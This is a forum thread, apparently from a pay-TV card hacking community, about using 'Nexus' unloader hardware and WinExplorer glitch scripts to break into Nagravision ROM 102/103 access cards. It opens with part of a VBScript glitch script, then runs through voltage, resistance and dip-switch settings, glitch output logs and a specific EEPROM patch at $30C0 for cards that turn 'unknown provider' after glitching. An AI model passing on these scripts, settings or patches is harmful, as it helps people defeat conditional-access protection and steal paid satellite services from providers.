' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen

RetVal = Hex(Number)
CurLen = Len(RetVal)

If CurLen < Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If

HexString = RetVal

End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

If sc.read(4) <> 4 Then
CheckChipVer = 0
Exit Function
End If

If getbyte(0) <> &H4E Then CheckChipVer = 0
If getbyte(1) <> &H44 Then CheckChipVer = 0
If getbyte(2) <> &H31 Then CheckChipVer = 0
If getbyte(3) <> &H33 Then CheckChipVer = 0

End Function

Public Function Hex2Dec(ByVal HexNumber)

' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent

Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function setupunlocker()

Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes

End Function

I am very interested in your success or looping stories. Please post results.

I just got my white Nexus from Milli, and I have been working on a rev 108. I haven't been able to get anything out of it, I am suspecting a defected loader.

I tried RebelSurf and now your script to no avial. It says "RX Data: -" while incrementally increasing the delay. RebelSurf's said "rstyadayada" repeatedly but no ---- or ++++ of any kind.

I realize that it may be this card but I don't have another locked card to prove this right now, and I'm not gonna glitch a good card.

I am running:
9v
700 ohm
dip 2 and 5 on
Newd13 (NewdRS when using Rebelsurf)
The card has an ATR and is a 102 rev 108

I have ran the 108 script 3 times and after a bit (not sure but like 15 minutes) I get this:


Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing Script
Script Error on Line 223
Sc.GetByte: Requested Byte Exceeds Last Read Request

Do you think this white Nexus is broke?

turn up your voltage to the loader trapofmind if you are using anything under 12 volts. If I run it at 7.5 volts I will get that too. I assume it is the cappacitors drain slowly and the voltage isn't enough to keep them charged. but if you are getting increasine AVR delay, then stop the script something isn't right. are you sure the card is not blockered? try the 105 unlocking script for a few seconds just to see if you get ++++-----+++++----- out of it.

I increased the voltage to 12v and tried the other script, this time it halts immediately and says: REV 108

I got this card from a guy who got it from a guy who says he got it from a guy who says it's looped. But it has ATR and it reports ROM 102 rev 108. I heard back through that chain that the guy didn't have a loader capable of higher revs.

what other script did you try?

Great post Crazy1. Thanks.

what other script did you try?

I tried the other script that you posted. I realize that it's for 106-107 and you said try a 105 script.

I have no idea if this card is blockered, I tried DEADBEEFBAADF00D but that didn't work.

N2edit says:
rom 102 rev 108
provider unknown

I wish I had a way to test this Nexus. Would a modded Mik III work? I've read elsewhere that they wont work on higher revs. (that's why I bought the white Nexus)

Mik III has 4053 chips in it. For higher revs you want 4619 chips like in the nexus. Crazy's scripts are good. I'm gonna try trading out the chips in one of my extra Mik III's and see how it goes.

trap of mind, the reason I said to run the 105 script for a few seconds is because if the card is spoofed then then the lower script maybe what you need, by the responses you are getting, it tells me the card is not streamlocked but spoofed.

700 ohms?? Isn't that too high? I was told on many forums for rev108 to set the pot around 2.10 - 2.35 ohms (700 ohm seems to be an impossible number actually unless I am confusing something).

P.S. sorry for the PM I did not see your signature :)

Is there a particular script that you would recommend?

I've tried the one I used my with Mik III "ROM102_ND13_A0FF-INTERCEPT-autoVCC_202" but it errors out quickly.

I also tried RebelSerf_102_OmniUnlocker_-StubbornFix2 to no avail.

Perhaps if I stuck it in the freezer on some Holy water ice cubes

700 ohms?? Isn't that too high? I was told on many forums for rev108 to set the pot around 2.10 - 2.35 ohms (700 ohm seems to be an impossible number actually unless I am confusing something).

P.S. sorry for the PM I did not see your signature :)
hey
tronix you are setting yours at 2.1K which is 2100 ohms or 2.35K which is 2350 ohms, that is with the ohm meter set at 20K setting, I use the 2000 ohms setting and dial it in at 700. or .7 at the 20K setting.

I wonder why they are erroing out, the autvcc20 is the one I usually use, however I changed the vcc's in it run from 15 to 0 as well not 90 to 2

Crazy1_79,
Is the pot on this loader an infinatly variable pot or 5.0, 2.2, etc.? Just a little info please. Is the pot one might be able to adjust with a shaking hand?
See my sig.

1one,

The one drawback to the white nexus is the pot. it is not a multi-turn pot and in the 200-700 Ohm range, mine is a little more than sensitive! I should have gone into micro-surgery based on the precision that is required for mine.

Shark,
Thanks!!! Just the guidance that I was searching for!

Agreed, the pot is touchy, but with a good ohm meter and three hands you can get whatever you need.

I can barely get one hand to work. And I have five working for me!

I wonder why they are erroing out, the autvcc20 is the one I usually use, however I changed the vcc's in it run from 15 to 0 as well not 90 to 2

I don't mean to fill this thread with my crap when it should be about these cool scripts...

But this thing is odd, no matter what script I run it just resets. However it still has ATR and rev 108. If I try any older (I hate to keep typing the word script, so I wont...oh crap) it errors out quickly, within a minute. If I use Rebelsurfs or the ones on this page they continue on for a while but rst continuously.

I don't know, but if a card is locked with a blocker doesn't it pop easier then if it's steamlocked? I know that was the case with the Rom 10's.

I haven't tried crazy1_79's scripts. I dont mean to speak for him. I believe he wants us to come to an intelligent conclusion based on his personal results. I appreciate any info. Regardless if its in the wrong thread or not.

were is the cams signature when you read caad can i still register with romcoder is the cam on the back of the card also says unknowprovider rev107 good atr any help fining cam to register try to get back in to testing again did dave i have know idea were the cam is please help!

tried with 3 cards:

1) one looped
2) two other did not pop and not going to try anmore since I don't want any other looped cards.

What settings do you use in WinExplorer for the 108 script?
UNlooper,Loader 2,102...etc....?
rec timeout?
byte delay?
reset delay?
stop bits?
parity?

I acquired a ROM 102 rev 106 today, it popped in under a minute using your script. That confirms my "white" Nexus works swell.

i have a 102 that is blockered to 109 and it does the same thing as you mentioned times out after a few avr increase messages... i have tried every script that i can think of to get back into it...

Trapofmind. If your rev108 is provider unknown you need the rebelsure fubar unlocking script.

Been there, done that. Every script I try times out or errors out quickly. This card needs something special.

Hi,

Can someone can suggest a good pot and a place to buy it?

thanks

Reg

Hi,

Just find this one at mouser for $10.50

Multi Turn Potentiometers 7/8 5K OHM 10 TURN WIREWOUND

Operating Temperature Range:- 55 C to + 125 C
Resistance:5 K Ohms
Termination Style:Solder Lugs
Tolerance:+/- 5 %
Product Category:Multi Turn Potentiometers

hxxp://www.bitechnologies.com/pdfs/7280.pdf


Reg

I have a few power supply's and I want to now wish is better for my t911

1- 9v - 100ma
2- 9v - 200ma
3- 12v - 500ma
4- 12v - 700ma

thanks!!!

I have a few power supply's and I want to now wish is better for my t911

1- 9v - 100ma
2- 9v - 200ma
3- 12v - 500ma
4- 12v - 700ma

thanks!!!
I think the 100 and 200 MA may be a little too low. 300ma is better, so I would try the 12 volt 500ma

turn up your voltage to the loader trapofmind if you are using anything under 12 volts. If I run it at 7.5 volts I will get that too. I assume it is the cappacitors drain slowly and the voltage isn't enough to keep them charged. but if you are getting increasine AVR delay, then stop the script something isn't right. are you sure the card is not blockered? try the 105 unlocking script for a few seconds just to see if you get ++++-----+++++----- out of it.

Could you tell me how to turn the voltage on the white nexus from mili?

Hi
I use the script 102 R105, with my unlocker whight from milli and I receive this message
TX Data : 90
RX Data : 4E 44 31 33
Let the 102 Glitching begin....
-NoRsp+-NoRsp+---+----NoRsp+----NoRsp+-NoRsp+---+----+----+---NoRsp+-+----+----+----+--
TX Data : A1
===========================================
Glitch Success!! A0FF-INTERCEPT IS ON
BootLoader 6F 00 RSP Received!!
VCC = 06 (~0.117647058823529 vdc)
Glitch Delay = 0325
Glitch type 06
===========================================
Script Script File: Transmission Completed

Timeout from 2A command
The Update Status Word is at 0 (Decimal)
The Fuse Byte is at 0 (Decimal)
i
this mean that and error happen, or the card was Unlocker?

Thanks and waiting...

I think the 100 and 200 MA may be a little too low. 300ma is better, so I would try the 12 volt 500ma
I buy a new power supply this one is 1.5V to 12V 300mA. One Q? were i have to read the ohms, because i thing I,m reading in a wrong place, if you can plase put a pic. excuse my inglish is not to god.

If you have the white nexus, look at the pic at the top of the page. The pot is to the right of the dip switches and to the right of that are 2 pads. This is where you want to read ohms.

If you have the white nexus, look at the pic at the top of the page. The pot is to the right of the dip switches and to the right of that are 2 pads. This is where you want to read ohms.

That's what i have

Thanks Crazy, managed to unlock 2 out of 3 Rev 107 cards which I have been struggling with for over 1 week. Using Blue Nexus 205 OHMS (close as I could get it to 200) dips 2 & 5 ON, 9v 300mA. Only problem is both cards took over 45min and both have went unknown provider. With that being said I was able to read the cards still, clean them, and load them and work perfectly fine in the receiver. Just need to fix the unknown provider and all good to go. Will have to play a little more with that one stubborn one. Any ideas for the unknown provider problem??

TS

Hi

Glitch Success!! A0FF-INTERCEPT IS ON



That means you're in. Try reading the card in n2edit.
Save the image, clean the codespace and write the clean image back to the card.

Thanks Crazy, managed to unlock 2 out of 3 Rev 107 cards which I have been struggling with for over 1 week. Using Blue Nexus 205 OHMS (close as I could get it to 200) dips 2 & 5 ON, 9v 300mA. Only problem is both cards took over 45min and both have went unknown provider. With that being said I was able to read the cards still, clean them, and load them and work perfectly fine in the receiver. Just need to fix the unknown provider and all good to go. Will have to play a little more with that one stubborn one. Any ideas for the unknown provider problem??
TS
perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000

To this
$30C0=A7BF8703808000000000000000000000

that will fixd unknown provider when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.

Hi
I use the script 102 R105, with my unlocker whight from milli and I receive this message
TX Data : 90
RX Data : 4E 44 31 33
Let the 102 Glitching begin....
-NoRsp+-NoRsp+---+----NoRsp+----NoRsp+-NoRsp+---+----+----+---NoRsp+-+----+----+----+--
TX Data : A1
===========================================
Glitch Success!! A0FF-INTERCEPT IS ON
BootLoader 6F 00 RSP Received!!
VCC = 06 (~0.117647058823529 vdc)
Glitch Delay = 0325
Glitch type 06
===========================================
Script Script File: Transmission Completed

Timeout from 2A command
The Update Status Word is at 0 (Decimal)
The Fuse Byte is at 0 (Decimal)
i
this mean that and error happen, or the card was Unlocker?

Thanks and waiting...





that means you glitched into card, read and proceed as normal. congrats. you popped a car.

I am trying your script on my Inboard Rom 102 - Rev. 285.
It is running now, but don't know if it will work on this high a rev.
I thought I read that this 285 was the equivelant to Rev. 107 for plastic, but when I tried the 106-107 script it would not run in Winexplore 5.0.

What can you suggest for those of us with the 311 IRD's and the inboard rom 102's, starting at Rev. 281 and goes up?

Thanks for any help Crazy1

Surfguy:)

Have another question about your very first post.
You state that you set the delay start to 3800. When I do that it reverts to 420. I can't find how to set the vcc start & limit to 15 and 00.
At the bottom of the Nagramaster Loader version window, I see - DELAY START- DELAY LIMIT - GLITCH MAX - GLITCH MIN - MIX - VCC MAX - TRYS.
Am I missing something and perhaps you have a different version of Nagramaster. Or are you talking about a different program?
I have messed with the default settings so many times, that I don't know what the default settings are supposed to be, or what works the best for everyone else!!!

Any help would be great at this point! My first rev. 285 I looped and don't want to do the same with this one!

Surfguy:)

perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000
To this
$30C0=A7BF8703808000000000000000000000
that will fixd unknown provider when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.


WOOOOOOOHOOOOOOOO worked like a charm thanks CRAZY!!

perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000

To this
$30C0=A7BF8703808000000000000000000000

that will fixd unknown provider when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.

Dosen't cleaning the codespace to the same thing?

Dosen't cleaning the codespace to the same thing?

No

Dosen't cleaning the codespace to the same thing?
TT is in one of those quick answer moods!! Been there a million times myself. Cleaning codespace will clean cards eeprom from A700 to BFFF that line of code is at 30C0 which is codespace that runs from 3000 to A6FF but of course the cards RAM is in there too. which is a nice chunk of space itself.

Have another question about your very first post.
You state that you set the delay start to 3800. When I do that it reverts to 420. I can't find how to set the vcc start & limit to 15 and 00.
At the bottom of the Nagramaster Loader version window, I see - DELAY START- DELAY LIMIT - GLITCH MAX - GLITCH MIN - MIX - VCC MAX - TRYS.
Am I missing something and perhaps you have a different version of Nagramaster. Or are you talking about a different program?
I have messed with the default settings so many times, that I don't know what the default settings are supposed to be, or what works the best for everyone else!!!

Any help would be great at this point! My first rev. 285 I looped and don't want to do the same with this one!

Surfguy:)
Surfguy, I have never popped a rev 285, never had to try. Skinerd who is a hell of hardware modder and Glitcher told me they are a bitch and will more than like loop. try dips 1 and 6 down. ohms at 700. With the modified 107 and 106
scipts. VCC will probally have to be changed too. I recently did a bunch of the cardless 311's and have a learned a thing or two about them in the progress. different dips to pop them, every card can have it slight variant in VCC responses.

I still have problem with my unlocker. do nothig. When I start glitching run fine but at 15 or 25 min stop the glitch response but the # of rest still run thats in MR-Ultimaten2 in the Rebelserf_rev_108_244 i dont have any response.

Ihave 3 102 cards= 1 rev_107 & 2 rev_108
I test any combination What I read
[/URL]
I think I need someting for Dummy http://smileys.smileycentral.com/cat/4/4_1_72.gif (http://www.smileycentral.com/?partner=ZSzeb001_ZNfox000)



If any one can give me ligth in my shadow I'll be appreciate...





[URL="http://smiley.smileycentral.com/download/index.jhtml?partner=ZSzeb098_ZNfox000&utm_id=7926"]http://www.smileycentral.com/sig.jsp?pc=ZSzeb098&pp=ZNfox000 (http://www.smileycentral.com/?partner=ZSzeb001_ZNfox000)

Surfguy, I have never popped a rev 285, never had to try. Skinerd who is a hell of hardware modder and Glitcher told me they are a bitch and will more than like loop. try dips 1 and 6 down. ohms at 700. With the modified 107 and 106
scipts. VCC will probally have to be changed too. I recently did a bunch of the cardless 311's and have a learned a thing or two about them in the progress. different dips to pop them, every card can have it slight variant in VCC responses.

I have figured out what your settings referred to, so no need to answer that part of my question. They are for changing the script in use with WinExplore proggy.

Now my new problem is that I just looped my second 311 at Rev. 285. Unlike before, instead of using the script files in Winexplore to loop my first one, this time I was just using Nargramaster(Loader version) and used these settings:
MIX=5 VCC=20 TRYS=120
The other settings were at their default.(All settings were for the White Nexus Loader 4619)
Apparently I was using settings that were a bit too aggressive!

I hope others will be careful, and learn from my mistakes!

LOL,
Surfguy:D

I read there is a script for card with provider unknown. Someone said you should use Rebelserf script to unlock cards with unknown provider. and rom10x... script for cards with provider. Hope this helps. I just unlocked a rom 102 rev 107 with pot set at 215. loader 3 settings, Blue nexus with 4619 chips, Rom10x... script, Newd13 flash, pins 2 and 5 on, 7.5 volts 500 ma. It unlocked in about a minute.

I have similar problem with a IRD 322 Rom103 rev 382,386

Sorry for the duplicate post.. I kept looking and founs this thread..

The first IRD 322 rev 386 will not respond so I went to second to rev 382..
the only way to get some kind of respond.I have to use the Mikobu111 mod..
I have used this for 311 irds with no problems..so I reflashed with one with newdS rebeld 307_387 unlocker script
with 4619 chips installed. and below you willl see that runs for a little bit then it stops..

NOw..If I use unlocker sold by MILI nexus with white caseas MILI stated is the same as the blue case..
this is what I get and stops also at line 138starts -----------------------------------------
and stops..I have tried dip 4,2 & 5, 1, 5. and voltage7.5............9.5.......12.5
and still no dice.. has anybody had any good response with this unlocker sold by MILI.....................
Sorry for the long post. but is hard for to navigateon dial up....

Question I read (loader 2 or loader 3) what does this mean it suppost to be on bottom of ceript
I can't figure it out. can someone explain.

thank again
tyfon

RESULTS with MIKOBU111 MOD with 4619 chips installed.
with white case unlocker sold by MILI I get ----------------- and stops in seconds
I get error on line 138 same as below.

Rom 103, Rev 382 found.
Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst2007Rst2007Rst21------Sc.Read:
Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read,
Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Requestpot

set at7.9 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07++++++++++07Rst22+Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 114
Sc.GetByte: Requested Byte Exceeds Last Read Requestpot

set at 16 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst20+++++++++07Rst23++07Rst24++++++++++ +++++++++++++++++++07Rst2B07Rst2B+07Rst2C+07Rst2C+ ++++++++++++++++++++++++++++++Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read RequestPot

set 18.9 at 7volts
Ram Intercept Installed. Trying to Open the 103.... Delay:31F1 VCC:48 Glitch Type:07Elapsed = 00:00:1807Rst4807Rst4807Rst49+07Rst4907Rst4A+07Rst 4A++07Rst4B+07Rst4B+07Rst4C07Rst4C+07Rst4C07Rst4D+ 07Rst4D07Rst4E07Rst4E07Rst4E07Rst4E07Rst4E07Rst4F0 7Rst4F07Rst4F07Rst5007Rst5007Rst50+07Rst5007Rst510 7Rst5107Rst5107Rst52+07Rst5207Rst52Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request



your help is appreciated.. thanks again

tyfon

I tried the rev106 107 modified script and another horror story looped in 8 seconds bye bye 107 kiss my $200.00 good bye

oh well
what I used:

white nexus from here 9v, 2 and 5 on newd13 .125 under 2k settings ran this on other scripts without errors just didn't want to pop so I decided to try this script

should of read thread and tried 700 ohms

I have similar problem with a IRD 322 Rom103 rev 382,386

Sorry for the duplicate post.. I kept looking and founs this thread..

The first IRD 322 rev 386 will not respond so I went to second to rev 382..
the only way to get some kind of respond.I have to use the Mikobu111 mod..
I have used this for 311 irds with no problems..so I reflashed with one with newdS rebeld 307_387 unlocker script
with 4619 chips installed. and below you willl see that runs for a little bit then it stops..

NOw..If I use unlocker sold by MILI nexus with white caseas MILI stated is the same as the blue case..
this is what I get and stops also at line 138starts -----------------------------------------
and stops..I have tried dip 4,2 & 5, 1, 5. and voltage7.5............9.5.......12.5
and still no dice.. has anybody had any good response with this unlocker sold by MILI.....................
Sorry for the long post. but is hard for to navigateon dial up....

Question I read (loader 2 or loader 3) what does this mean it suppost to be on bottom of ceript
I can't figure it out. can someone explain.

thank again
tyfon

RESULTS with MIKOBU111 MOD with 4619 chips installed.
with white case unlocker sold by MILI I get ----------------- and stops in seconds
I get error on line 138 same as below.

Rom 103, Rev 382 found.
Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst2007Rst2007Rst21------Sc.Read:
Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read,
Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Requestpot

set at7.9 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07++++++++++07Rst22+Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 114
Sc.GetByte: Requested Byte Exceeds Last Read Requestpot

set at 16 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst20+++++++++07Rst23++07Rst24++++++++++ +++++++++++++++++++07Rst2B07Rst2B+07Rst2C+07Rst2C+ ++++++++++++++++++++++++++++++Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read RequestPot

set 18.9 at 7volts
Ram Intercept Installed. Trying to Open the 103.... Delay:31F1 VCC:48 Glitch Type:07Elapsed = 00:00:1807Rst4807Rst4807Rst49+07Rst4907Rst4A+07Rst 4A++07Rst4B+07Rst4B+07Rst4C07Rst4C+07Rst4C07Rst4D+ 07Rst4D07Rst4E07Rst4E07Rst4E07Rst4E07Rst4E07Rst4F0 7Rst4F07Rst4F07Rst5007Rst5007Rst50+07Rst5007Rst510 7Rst5107Rst5107Rst52+07Rst5207Rst52Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request



your help is appreciated.. thanks again

tyfon


Whoa dude, you are using 102 scripts to try open a rom 103. I can't believe you haven't looped it. get some 103 scripts and try again.

I have a white nexus loader i just got from mili which has looped 4 cards in a row for me in less then 30 seconds each. I have been unlocking rom 102 240-241 and 311 internal cams with only 1 out of 50 looped using orange nexus. I used the same power supply(12v) and serial cable from the orange nexus. the pot was set to 250 ohm. What the F**k is going on with this unlocker!. Could someone take a picture of their unlocker so i can see if the pot it installed correctly..

I have a white nexus loader i just got from mili which has looped 4 cards in a row for me in less then 30 seconds each. I have been unlocking rom 102 240-241 and 311 internal cams with only 1 out of 50 looped using orange nexus. I used the same power supply(12v) and serial cable from the orange nexus. the pot was set to 250 ohm. What the F**k is going on with this unlocker!. Could someone take a picture of their unlocker so i can see if the pot it installed correctly..
once again read whole thread, try ohms at 700 and dips 2 and 5

Hello,
I have a friend who has a white nexus also, I dont see how a setting of 250 ohms and going to 700 ohms is going to keep from looping my cards. If anythng from everything ive read the higher ohms will loop faster. my dip settings have been at 2 and 5 on while running unlocker scripts. I mean this thing is literally looping cards in less then 30 seconds something greater is the real problem. I believe i have excluded the power supply, computer and serial cable, winex settings, script, becuase all of these have been tested on my friends white nexus and work without problems. Im not sure what is looping my cards but 30 seconds would indicate it may be a hardware problem. 700 ohms is not a magical setting, many people have had success at the ohms setting ive tried it at including my friends unlocker which he has not moved from that setting and has done no less then 30 rom 102's.

crazy1_79 is right I went back and popped 2 rev 108's at .892 ohms very close to .700 ohm's

lesson learned !!!!!!!

Hello,
I have no doubt the setting will work for some, what im saying is with the lower ohm setting it might not unlock but it should not loop 5 cards no way no how. im sure ppl have used lower settings to unlock or they have adjusted their pot in an attempt to unlock down to 250 ohms but their cards did not loop. My friends white unlocker has done several cards at 250 ohm no problem so thats what i was basing my starting point at then adjust to higher ohms if it would not unlock, the thing is I never go much of a chance when cards were looping at less then 30 seconds. If anyone has some explanation as to what might be wrong please let me know.

Dollarz. they are all very touchy cards. 700 ohms from 200 cut my looping in half. since I have used the scripts I posted. I am 100 percent.

Hello, I totally agree with what your saying and your script has worked fine to unlock 2 cards with my friends unlocker at 250 ohms. What i disagree with is that there is some universal setting of 700 ohms that works on these white unlockers that would be totally untrue, each unlocker is unique in the fact that the card, computer, power supply, serial cable are diffrent. im sure that those using a 12v power supply when measured can vary from 11v to 13.5v easily and the amps for each again is diffrent creating even more variables. I have tried 700 ohms on my unlocker(would not let script run more then 10 seconds) all i get is ff's, when the very same script and setup on my friends white unlocker works perfectly. I know im sounding like some prick with my incessant posts but I really need help to get this thing working right or just junk it.

Could someone take a picture of their unlocker so i can see if the pot it installed correctly..

There you go. Good luck.

The two wires attached are my addition. They go to test clips.

Hello,
Thanks for taking the time to post the picture. Unfortunately everything looks like its installed correctly with the same type pot on my device. I still cant figure out what is looping my cards. Maybe I have it all wrong and because this thing is 100% in looping my 5 cards that i should try and use it as an unlooper??.

crazy1 - I got a 284 and 286 311's that I just cant get to open - Your expert advice would be great. oh and its with a white nexus varibal power supply 7.5, 9 or 12 Volts 500 ma

can someone explain why, when using this script, or any of the rom10x scripts, I can get past AVR delay 23.